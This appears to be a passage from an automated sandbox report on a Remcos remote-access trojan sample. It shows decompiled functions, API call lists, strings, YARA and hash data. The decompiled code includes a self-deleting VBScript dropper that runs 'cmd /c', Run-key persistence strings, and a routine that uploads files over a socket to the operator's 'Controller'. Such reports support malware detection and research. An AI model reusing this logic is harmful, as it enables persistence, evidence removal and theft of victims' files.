                                    				_t79 = E0040427F(0x45f724,  &_v172, L"\"\"\", 0");
                                    				E00403311(E004030A6(0x45f724,  &_v100, E00403030( &_v76, E00404429(0x45f724,  &_v52, E0040427F(0x45f724,  &_v148, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t252,  &_a4), _t79), 0, _t252, "\n"));
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L0040766C(0x45f724,  &_v28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
                                    				_t92 = L00401EEB( &_v124);
                                    				_t93 = E00402489();
                                    				if(L00417947(L00401EEB( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", L00401EEB( &_v124), 0x45f724, 0x45f724, 0) > 0x20) {
                                    					ExitProcess(0);
                                    				}
                                    				L00401EF0();
                                    				L00401EF0();
                                    				return L00401EF0();
                                    			}

                                    APIs
                                      • Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
                                      • Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B1DB
                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B1EE
                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B206
                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B234
                                      • Part of subcall function 00409D73: TerminateThread.KERNEL32(0040884B,00000000,0046C500,0040ADA3,?,0046C518,0046C500), ref: 00409D82
                                      • Part of subcall function 00409D73: UnhookWindowsHookEx.USER32(00000000), ref: 00409D92
                                      • Part of subcall function 00409D73: TerminateThread.KERNEL32(00408830,00000000,?,0046C518,0046C500), ref: 00409DA4
                                      • Part of subcall function 00417947: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0045F724,00000000,00000000,?,0040B0BC,00000000,00000000), ref: 00417986
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B457
                                    • ExitProcess.KERNEL32 ref: 0040B463
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                    • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                    • API String ID: 1861856835-219127200
                                    • Opcode ID: bb25c8fdeaa4f241debf8e6a0405e14f512fb9588bc743e7edfe07456e5c5e86
                                    • Instruction ID: 15120c8502facc1a94d34f6ce0dfcdb30145111763f7023834469a4ad8d2fcb5
                                    • Opcode Fuzzy Hash: bb25c8fdeaa4f241debf8e6a0405e14f512fb9588bc743e7edfe07456e5c5e86
                                    • Instruction Fuzzy Hash: 52915E31A101185ACB14FBA1DCA6AEF776AAF50744F10007FB806771E3EF785E4A869D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 77%
                                    			E004064A2(intOrPtr __ecx, void* __edx, WCHAR* _a4, char _a8, char _a32, char _a56) {
                                    				void* _v12;
                                    				union _LARGE_INTEGER _v16;
                                    				struct _OVERLAPPED* _v20;
                                    				long _v24;
                                    				long _v28;
                                    				intOrPtr _v32;
                                    				long _v36;
                                    				struct _OVERLAPPED* _v40;
                                    				union _LARGE_INTEGER* _v44;
                                    				signed int _v48;
                                    				signed int _v52;
                                    				struct %anon52 _v64;
                                    				intOrPtr _v68;
                                    				struct %anon52 _v80;
                                    				union _LARGE_INTEGER _v84;
                                    				intOrPtr _v88;
                                    				char _v112;
                                    				char _v136;
                                    				char _v160;
                                    				char _v184;
                                    				char _v208;
                                    				char _v232;
                                    				char _v256;
                                    				char _v280;
                                    				char _v304;
                                    				char _v328;
                                    				char _v352;
                                    				char _v376;
                                    				char _v400;
                                    				char _v424;
                                    				char _v448;
                                    				char _v472;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				struct %anon52 _t117;
                                    				void* _t119;
                                    				void* _t126;
                                    				long _t136;
                                    				void* _t137;
                                    				signed int _t138;
                                    				struct _OVERLAPPED* _t145;
                                    				signed int _t148;
                                    				void* _t154;
                                    				void* _t156;
                                    				void* _t157;
                                    				void* _t173;
                                    				long _t198;
                                    				signed int _t203;
                                    				void* _t216;
                                    				union _LARGE_INTEGER _t280;
                                    				intOrPtr _t281;
                                    				union _LARGE_INTEGER* _t295;
                                    				void* _t297;
                                    				void* _t301;
                                    				void* _t302;
                                    				void* _t303;
                                    				void* _t304;
                                    				void* _t305;
                                    
                                    				_t278 = __edx;
                                    				_v68 = __ecx;
                                    				E0040498B(__ecx);
                                    				_t302 = _t301 - 0x10;
                                    				asm("movsd");
                                    				asm("movsd");
                                    				asm("movsd");
                                    				asm("movsd");
                                    				_t299 = _v68;
                                    				E00404A08(__edx);
                                    				_v28 = 0x186a0;
                                    				_v20 = 0;
                                    				_t297 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                                    				_t310 = _t297 - 0xffffffff;
                                    				if(_t297 != 0xffffffff) {
                                    					_v80.LowPart = 0;
                                    					_v80.HighPart = 0;
                                    					__imp__GetFileSizeEx(_t297,  &_v80);
                                    					_t203 = _v80.HighPart;
                                    					_t117 = _v80;
                                    					_v48 = _t203;
                                    					_v32 = _t203;
                                    					_v52 = _t117;
                                    					_v16.LowPart = _t117;
                                    					E0040427F(0,  &_v112, _a4);
                                    					_t119 = E0041733B( &_v136,  &_v112);
                                    					_t303 = _t302 - 0x18;
                                    					_t280 = "Uploading file to Controller: ";
                                    					L004075C2(0, _t303, _t280, _t297, __eflags, _t119);
                                    					_t304 = _t303 - 0x14;
                                    					E00402084(0, _t304, "[Info]");
                                    					L00416C80(0, _t297);
                                    					_t305 = _t304 + 0x30;
                                    					L00401FC7();
                                    					L00401EF0();
                                    					_v36 = 1;
                                    					_v40 = 0;
                                    					_t126 = L00450880(_v52, _v48, 0x186a0, 0);
                                    					_t210 = _t280;
                                    					asm("xorps xmm0, xmm0");
                                    					_v88 = _t126 + 1;
                                    					asm("adc ecx, ebx");
                                    					asm("movlpd [ebp-0x3c], xmm0");
                                    					_v84.LowPart = _t280;
                                    					__eflags = _v48;
                                    					if(__eflags < 0) {
                                    						L17:
                                    						CloseHandle(_t297);
                                    						L00404E0B(_t299);
                                    						_t198 = 1;
                                    					} else {
                                    						if(__eflags > 0) {
                                    							L5:
                                    							_v44 = _v64.HighPart.LowPart;
                                    							_v64.HighPart.LowPart = _v64;
                                    							_t136 = 0x186a0;
                                    							goto L6;
                                    							do {
                                    								do {
                                    									L6:
                                    									_t281 = _v32;
                                    									__eflags = _v20 - _t281;
                                    									if(__eflags >= 0) {
                                    										_t210 = _v16.LowPart;
                                    										if(__eflags > 0) {
                                    											L9:
                                    											_t136 = _t210;
                                    											_v20 = _t281;
                                    											_v28 = _t136;
                                    										} else {
                                    											__eflags = _t136 - _t210;
                                    											if(__eflags > 0) {
                                    												goto L9;
                                    											}
                                    										}
                                    									}
                                    									_push(_t136);
                                    									_t137 = E0042F4C6(_t210, _t281, _t299, __eflags);
                                    									_push(0);
                                    									_v12 = _t137;
                                    									_v24 = 0;
                                    									_t138 = SetFilePointerEx(_t297, _v64.HighPart.LowPart, _v44, 0);
                                    									__eflags = _t138;
                                    									if(_t138 == 0) {
                                    										_t306 = _t305 - 0x18;
                                    										_t216 = _t305 - 0x18;
                                    										_push("SetFilePointerEx error");
                                    										goto L23;
                                    									} else {
                                    										_t148 = ReadFile(_t297, _v12, _v28,  &_v24, 0);
                                    										__eflags = _t148;
                                    										if(_t148 == 0) {
                                    											_t306 = _t305 - 0x18;
                                    											_t216 = _t305 - 0x18;
                                    											_push("ReadFile error");
                                    											L23:
                                    											E00402084(0, _t216);
                                    											E00402084(0, _t306 - 0x18, "[ERROR]");
                                    											L00416C80(0, _t297);
                                    											E0042F4CF(_v12);
                                    											CloseHandle(_t297);
                                    											goto L24;
                                    										} else {
                                    											__eflags = _v24;
                                    											if(__eflags == 0) {
                                    												E0042F4CF(_v12);
                                    												CloseHandle(_t297);
                                    												L00404E0B(_t299);
                                    												_t145 = 1;
                                    												goto L25;
                                    											} else {
                                    												E0040427F(0,  &_v112, _a4);
                                    												_t154 = E004020AB(0,  &_v472, _t281, __eflags, _v12, _v24);
                                    												_t305 = _t305 - 0x18;
                                    												_t156 = E00417260(0x46c238,  &_v448, _v88, _v84);
                                    												_t157 = E00417260(0x46c238,  &_v424, _v36, _v40);
                                    												L00402F1D(_t305, L00402F93(0x46c238,  &_v136, L00402F93(0x46c238,  &_v160, L00402F93(0x46c238,  &_v184, L00402F1D( &_v208, L00402F93(0x46c238,  &_v232, L00402F1D( &_v256, L00402F93(0x46c238,  &_v280, L00402F93(0x46c238,  &_v304, L00402F93(0x46c238,  &_v328, L00402F93(0x46c238,  &_v352, L00402F93(0x46c238,  &_v376, E0041739C(0x46c238,  &_v400,  &_v112), __eflags, 0x46c238), __eflags,  &_a8), __eflags, 0x46c238), __eflags,  &_a32), __eflags, 0x46c238), _t157), __eflags, 0x46c238), _t156), __eflags, 0x46c238), __eflags,  &_a56), __eflags, 0x46c238), _t154);
                                    												_t299 = _v68;
                                    												_push(0x52);
                                    												_t173 = L00404AA4(0x46c238, _v68, _t171, __eflags);
                                    												__eflags = _t173 - 0xffffffff;
                                    												L00401FC7();
                                    												L00401FC7();
                                    												L00401FC7();
                                    												L00401FC7();
                                    												L00401FC7();
                                    												L00401FC7();
                                    												L00401FC7();
                                    												L00401FC7();
                                    												L00401FC7();
                                    												L00401FC7();
                                    												L00401FC7();
                                    												L00401FC7();
                                    												L00401FC7();
                                    												L00401FC7();
                                    												L00401FC7();
                                    												L00401EF0();
                                    												__eflags = 0x46c200 | _t173 == 0xffffffff;
                                    												if((0x46c200 | _t173 == 0xffffffff) != 0) {
                                    													L00404E0B(_t299);
                                    													CloseHandle(_t297);
                                    													E0042F4CF(_v12);
                                    													_t198 = 0;
                                    												} else {
                                    													goto L14;
                                    												}
                                    											}
                                    										}
                                    									}
                                    									goto L18;
                                    									L14:
                                    									E0042F4CF(_v12);
                                    									_t136 = _v28;
                                    									_v16.LowPart = _v16 - _t136;
                                    									_t295 = _v44;
                                    									asm("sbb ecx, [ebp-0x10]");
                                    									_v36 = _v36 + 1;
                                    									_push(0);
                                    									_pop(0);
                                    									asm("adc [ebp-0x24], ebx");
                                    									_t210 = _v64.HighPart.LowPart + _t136;
                                    									_v64.HighPart = _t210;
                                    									asm("adc edx, [ebp-0x10]");
                                    									_v44 = _t295;
                                    									__eflags = _t295 - _v48;
                                    								} while (__eflags < 0);
                                    								if(__eflags > 0) {
                                    									goto L17;
                                    								} else {
                                    									goto L16;
                                    								}
                                    								goto L18;
                                    								L16:
                                    								__eflags = _t210 - _v52;
                                    							} while (_t210 < _v52);
                                    							goto L17;
                                    						} else {
                                    							__eflags = _v52;
                                    							if(_v52 <= 0) {
                                    								goto L17;
                                    							} else {
                                    								goto L5;
                                    							}
                                    						}
                                    					}
                                    				} else {
                                    					E004020EC(0, _t302 - 0x18, _t278, _t310,  &_a8);
                                    					_push(0x53);
                                    					L00404AA4(0, 0x46c2e8, _t278, _t310);
                                    					L24:
                                    					L00404E0B(_t299);
                                    					_t145 = 0;
                                    					L25:
                                    					_t198 = _t145;
                                    				}
                                    				L18:
                                    				L00401FC7();
                                    				L00401FC7();
                                    				L00401FC7();
                                    				return _t198;
                                    			}

                                    0x004064a2
                                    0x004064ae
                                    0x004064b1
                                    0x004064b6
                                    0x004064c0
                                    0x004064c1
                                    0x004064c2
                                    0x004064c3
                                    0x004064c4
                                    0x004064c9
                                    0x004064d0
                                    0x004064ea
                                    0x004064f3
                                    0x004064f5
                                    0x004064f8
                                    0x0040651c
                                    0x00406521
                                    0x00406524
                                    0x0040652a
                                    0x0040652d
                                    0x00406533
                                    0x00406536
                                    0x0040653c
                                    0x0040653f
                                    0x00406542
                                    0x00406550
                                    0x00406555
                                    0x00406558
                                    0x00406560
                                    0x00406565
                                    0x0040656f
                                    0x00406574
                                    0x00406579
                                    0x00406582
                                    0x0040658a
                                    0x00406595
                                    0x004065a0
                                    0x004065a6
                                    0x004065ae
                                    0x004065b0
                                    0x004065b3
                                    0x004065b6
                                    0x004065b8
                                    0x004065bd
                                    0x004065c0
                                    0x004065c3
                                    0x00406864
                                    0x00406865
                                    0x0040686d
                                    0x00406872
                                    0x004065c9
                                    0x004065c9
                                    0x004065d4
                                    0x004065d7
                                    0x004065dd
                                    0x004065e0
                                    0x004065e0
                                    0x004065e5
                                    0x004065e5
                                    0x004065e5
                                    0x004065e5
                                    0x004065e8
                                    0x004065eb
                                    0x004065ed
                                    0x004065f0
                                    0x004065f6
                                    0x004065f6
                                    0x004065f8
                                    0x004065fb
                                    0x004065f2
                                    0x004065f2
                                    0x004065f4
                                    0x00000000
                                    0x00000000
                                    0x004065f4
                                    0x004065f0
                                    0x004065fe
                                    0x004065ff
                                    0x00406605
                                    0x0040660a
                                    0x00406610
                                    0x00406614
                                    0x0040661a
                                    0x0040661c
                                    0x004068da
                                    0x004068dd
                                    0x004068df
                                    0x00000000
                                    0x00406622
                                    0x0040662f
                                    0x00406635
                                    0x00406637
                                    0x004068ce
                                    0x004068d1
                                    0x004068d3
                                    0x004068e4
                                    0x004068e4
                                    0x004068f3
                                    0x004068f8
                                    0x00406900
                                    0x00406909
                                    0x00000000
                                    0x0040663d
                                    0x0040663d
                                    0x00406641
                                    0x004068b5
                                    0x004068bc
                                    0x004068c4
                                    0x004068cb
                                    0x00000000
                                    0x00406647
                                    0x0040664d
                                    0x0040665e
                                    0x00406663
                                    0x00406680
                                    0x00406695
                                    0x00406754
                                    0x00406759
                                    0x0040675d
                                    0x00406761
                                    0x00406766
                                    0x00406772
                                    0x0040677d
                                    0x00406788
                                    0x00406793
                                    0x0040679e
                                    0x004067a9
                                    0x004067b4
                                    0x004067bf
                                    0x004067ca
                                    0x004067d5
                                    0x004067e0
                                    0x004067eb
                                    0x004067f6
                                    0x00406801
                                    0x0040680c
                                    0x00406814
                                    0x00406819
                                    0x0040681b
                                    0x00406899
                                    0x0040689f
                                    0x004068a8
                                    0x004068ae
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040681b
                                    0x00406641
                                    0x00406637
                                    0x00000000
                                    0x0040681d
                                    0x00406820
                                    0x00406825
                                    0x00406828
                                    0x0040682b
                                    0x00406832
                                    0x00406835
                                    0x00406839
                                    0x00406841
                                    0x00406842
                                    0x00406845
                                    0x00406847
                                    0x0040684a
                                    0x0040684d
                                    0x00406850
                                    0x00406850
                                    0x00406859
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040685b
                                    0x0040685b
                                    0x0040685b
                                    0x00000000
                                    0x004065cb
                                    0x004065cb
                                    0x004065ce
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004065ce
                                    0x004065c9
                                    0x004064fa
                                    0x00406503
                                    0x00406508
                                    0x0040650f
                                    0x0040690f
                                    0x00406911
                                    0x00406916
                                    0x00406918
                                    0x00406918
                                    0x00406918
                                    0x00406874
                                    0x00406877
                                    0x0040687f
                                    0x00406887
                                    0x00406894

                                    APIs
                                      • Part of subcall function 00404A08: connect.WS2_32(?,0046DBA0,00000010), ref: 00404A23
                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064ED
                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00406524
                                    • __aulldiv.LIBCMT ref: 004065A6
                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 00406614
                                    • ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 0040662F
                                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                      • Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $[ERROR]$[Info]
                                    • API String ID: 1319223106-2190262076
                                    • Opcode ID: 4dbe64790c62d5ee7030b993c1dde1e61187f4f8000e9570b2f5292ed33d26a1
                                    • Instruction ID: 173749a7d42c5eabba2dba03019d43edcf8f50480dc145d367e539a2da324ad2
                                    • Opcode Fuzzy Hash: 4dbe64790c62d5ee7030b993c1dde1e61187f4f8000e9570b2f5292ed33d26a1
                                    • Instruction Fuzzy Hash: F5C16B31A00219ABCB14FBA5DD829EEB7B5AF44304F10817FF406B62D1EF385A449F99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00449546(intOrPtr _a4) {
                                    				intOrPtr _v8;
                                    				intOrPtr _t25;
                                    				intOrPtr* _t26;
                                    				intOrPtr _t28;
                                    				intOrPtr* _t29;
                                    				intOrPtr* _t31;
                                    				intOrPtr* _t45;
                                    				intOrPtr* _t46;
                                    				intOrPtr* _t47;
                                    				intOrPtr* _t55;
                                    				intOrPtr* _t70;
                                    				intOrPtr _t74;
                                    
                                    				_t74 = _a4;
                                    				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                    				if(_t25 != 0 && _t25 != 0x46a188) {
                                    					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                    					if(_t45 != 0 &&  *_t45 == 0) {
                                    						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                    						if(_t46 != 0 &&  *_t46 == 0) {
                                    							E004401F5(_t46);
                                    							L00448782( *((intOrPtr*)(_t74 + 0x88)));
                                    						}
                                    						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                    						if(_t47 != 0 &&  *_t47 == 0) {
                                    							E004401F5(_t47);
                                    							L00448C3C( *((intOrPtr*)(_t74 + 0x88)));
                                    						}
                                    						E004401F5( *((intOrPtr*)(_t74 + 0x7c)));
                                    						E004401F5( *((intOrPtr*)(_t74 + 0x88)));
                                    					}
                                    				}
                                    				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                    				if(_t26 != 0 &&  *_t26 == 0) {
                                    					E004401F5( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                    					E004401F5( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                    					E004401F5( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                    					E004401F5( *((intOrPtr*)(_t74 + 0x8c)));
                                    				}
                                    				L004496B9( *((intOrPtr*)(_t74 + 0x9c)));
                                    				_t28 = 6;
                                    				_t16 = _t74 + 0xa0; // 0xa0
                                    				_t55 = _t16;
                                    				_v8 = _t28;
                                    				_t18 = _t74 + 0x28; // 0x28
                                    				_t70 = _t18;
                                    				do {
                                    					if( *((intOrPtr*)(_t70 - 8)) != 0x46a2a8) {
                                    						_t31 =  *_t70;
                                    						if(_t31 != 0 &&  *_t31 == 0) {
                                    							E004401F5(_t31);
                                    							E004401F5( *_t55);
                                    						}
                                    						_t28 = _v8;
                                    					}
                                    					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                    						_t29 =  *((intOrPtr*)(_t70 - 4));
                                    						if(_t29 != 0 &&  *_t29 == 0) {
                                    							E004401F5(_t29);
                                    						}
                                    						_t28 = _v8;
                                    					}
                                    					_t55 = _t55 + 4;
                                    					_t70 = _t70 + 0x10;
                                    					_t28 = _t28 - 1;
                                    					_v8 = _t28;
                                    				} while (_t28 != 0);
                                    				return E004401F5(_t74);
                                    			}
                                    0x0044954e
                                    0x00449552
                                    0x0044955a
                                    0x00449563
                                    0x00449568
                                    0x0044956f
                                    0x00449577
                                    0x0044957f
                                    0x0044958a
                                    0x00449590
                                    0x00449591
                                    0x00449599
                                    0x004495a1
                                    0x004495ac
                                    0x004495b2
                                    0x004495b6
                                    0x004495c1
                                    0x004495c7
                                    0x00449568
                                    0x004495c8
                                    0x004495d0
                                    0x004495e3
                                    0x004495f6
                                    0x00449604
                                    0x0044960f
                                    0x00449614
                                    0x0044961d
                                    0x00449625
                                    0x00449626
                                    0x00449626
                                    0x0044962c
                                    0x0044962f
                                    0x0044962f
                                    0x00449632
                                    0x00449639
                                    0x0044963b
                                    0x0044963f
                                    0x00449647
                                    0x0044964e
                                    0x00449654
                                    0x00449655
                                    0x00449655
                                    0x0044965c
                                    0x0044965e
                                    0x00449663
                                    0x0044966b
                                    0x00449670
                                    0x00449671
                                    0x00449671
                                    0x00449674
                                    0x00449677
                                    0x0044967a
                                    0x0044967d
                                    0x0044967d
                                    0x0044968f

                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 0044958A
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 0044879F
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 004487B1
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 004487C3
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 004487D5
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 004487E7
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 004487F9
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 0044880B
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 0044881D
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 0044882F
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 00448841
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 00448853
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 00448865
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 00448877
                                    • _free.LIBCMT ref: 0044957F
                                      • Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                                      • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
                                    • _free.LIBCMT ref: 004495A1
                                    • _free.LIBCMT ref: 004495B6
                                    • _free.LIBCMT ref: 004495C1
                                    • _free.LIBCMT ref: 004495E3
                                    • _free.LIBCMT ref: 004495F6
                                    • _free.LIBCMT ref: 00449604
                                    • _free.LIBCMT ref: 0044960F
                                    • _free.LIBCMT ref: 00449647
                                    • _free.LIBCMT ref: 0044964E
                                    • _free.LIBCMT ref: 0044966B
                                    • _free.LIBCMT ref: 00449683
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0
                                    • Opcode ID: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
                                    • Instruction ID: bc7df33f33a806a4e6538402b94214bd38d1e854ce5dbc401830de06ad29eac0
                                    • Opcode Fuzzy Hash: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
                                    • Instruction Fuzzy Hash: 46316B32600601AFFB21AA3AD845B5B73E8AF01354F21441FE659D7251DF3AAD509B2C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 41%
                                    			E0044F255(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                    				signed int _v5;
                                    				char _v6;
                                    				void* _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				char _v24;
                                    				intOrPtr _v36;
                                    				signed int _v44;
                                    				void _v48;
                                    				char _v72;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed int _t114;
                                    				signed int _t123;
                                    				signed char _t124;
                                    				signed int _t134;
                                    				intOrPtr _t164;
                                    				intOrPtr _t180;
                                    				signed int* _t190;
                                    				signed int _t192;
                                    				char _t197;
                                    				signed int _t203;
                                    				signed int _t206;
                                    				signed int _t215;
                                    				signed int _t217;
                                    				signed int _t219;
                                    				signed int _t225;
                                    				signed int _t227;
                                    				signed int _t234;
                                    				signed int _t235;
                                    				signed int _t237;
                                    				signed int _t239;
                                    				signed char _t242;
                                    				intOrPtr _t245;
                                    				void* _t248;
                                    				void* _t252;
                                    				void* _t262;
                                    				signed int _t263;
                                    				signed int _t266;
                                    				signed int _t269;
                                    				signed int _t270;
                                    				void* _t272;
                                    				void* _t274;
                                    				void* _t275;
                                    				void* _t277;
                                    				void* _t278;
                                    				void* _t280;
                                    				void* _t284;
                                    
                                    				_t262 = L0044EFB8(__ecx,  &_v72, _a16, _a20, _a24);
                                    				_t192 = 6;
                                    				memcpy( &_v48, _t262, _t192 << 2);
                                    				_t274 = _t272 + 0x1c;
                                    				_t248 = _t262 + _t192 + _t192;
                                    				_t263 = _t262 | 0xffffffff;
                                    				if(_v36 != _t263) {
                                    					_t114 = E00448575(_t248, _t263, __eflags);
                                    					_t190 = _a8;
                                    					 *_t190 = _t114;
                                    					__eflags = _t114 - _t263;
                                    					if(_t114 != _t263) {
                                    						_v20 = _v20 & 0x00000000;
                                    						_v24 = 0xc;
                                    						_t275 = _t274 - 0x18;
                                    						 *_a4 = 1;
                                    						_push(6);
                                    						_v16 =  !(_a16 >> 7) & 1;
                                    						_push( &_v24);
                                    						_push(_a12);
                                    						memcpy(_t275,  &_v48, 1 << 2);
                                    						_t197 = 0;
                                    						_t252 = L0044EF23();
                                    						_t277 = _t275 + 0x2c;
                                    						_v12 = _t252;
                                    						__eflags = _t252 - 0xffffffff;
                                    						if(_t252 != 0xffffffff) {
                                    							L11:
                                    							_t123 = GetFileType(_t252);
                                    							__eflags = _t123;
                                    							if(_t123 != 0) {
                                    								__eflags = _t123 - 2;
                                    								if(_t123 != 2) {
                                    									__eflags = _t123 - 3;
                                    									_t124 = _v48;
                                    									if(_t123 == 3) {
                                    										_t124 = _t124 | 0x00000008;
                                    										__eflags = _t124;
                                    									}
                                    								} else {
                                    									_t124 = _v48 | 0x00000040;
                                    								}
                                    								_v5 = _t124;
                                    								E004484BE(_t197,  *_t190, _t252);
                                    								_t242 = _v5 | 0x00000001;
                                    								_v5 = _t242;
                                    								_v48 = _t242;
                                    								 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
                                    								_t203 =  *_t190;
                                    								_t205 = (_t203 & 0x0000003f) * 0x30;
                                    								__eflags = _a16 & 0x00000002;
                                    								 *((char*)( *((intOrPtr*)(0x46b800 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
                                    								if((_a16 & 0x00000002) == 0) {
                                    									L20:
                                    									_v6 = 0;
                                    									_push( &_v6);
                                    									_push(_a16);
                                    									_t278 = _t277 - 0x18;
                                    									_t206 = 6;
                                    									_push( *_t190);
                                    									memcpy(_t278,  &_v48, _t206 << 2);
                                    									_t134 = L0044ECD6(_t190,  &_v48 + _t206 + _t206,  &_v48);
                                    									_t280 = _t278 + 0x30;
                                    									__eflags = _t134;
                                    									if(__eflags == 0) {
                                    										 *((char*)( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
                                    										 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
                                    										__eflags = _v5 & 0x00000048;
                                    										if((_v5 & 0x00000048) == 0) {
                                    											__eflags = _a16 & 0x00000008;
                                    											if((_a16 & 0x00000008) != 0) {
                                    												_t225 =  *_t190;
                                    												_t227 = (_t225 & 0x0000003f) * 0x30;
                                    												_t164 =  *((intOrPtr*)(0x46b800 + (_t225 >> 6) * 4));
                                    												_t87 = _t164 + _t227 + 0x28;
                                    												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
                                    												__eflags =  *_t87;
                                    											}
                                    										}
                                    										_t266 = _v44;
                                    										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
                                    										if((_t266 & 0xc0000000) != 0xc0000000) {
                                    											L31:
                                    											__eflags = 0;
                                    											return 0;
                                    										} else {
                                    											__eflags = _a16 & 0x00000001;
                                    											if((_a16 & 0x00000001) == 0) {
                                    												goto L31;
                                    											}
                                    											CloseHandle(_v12);
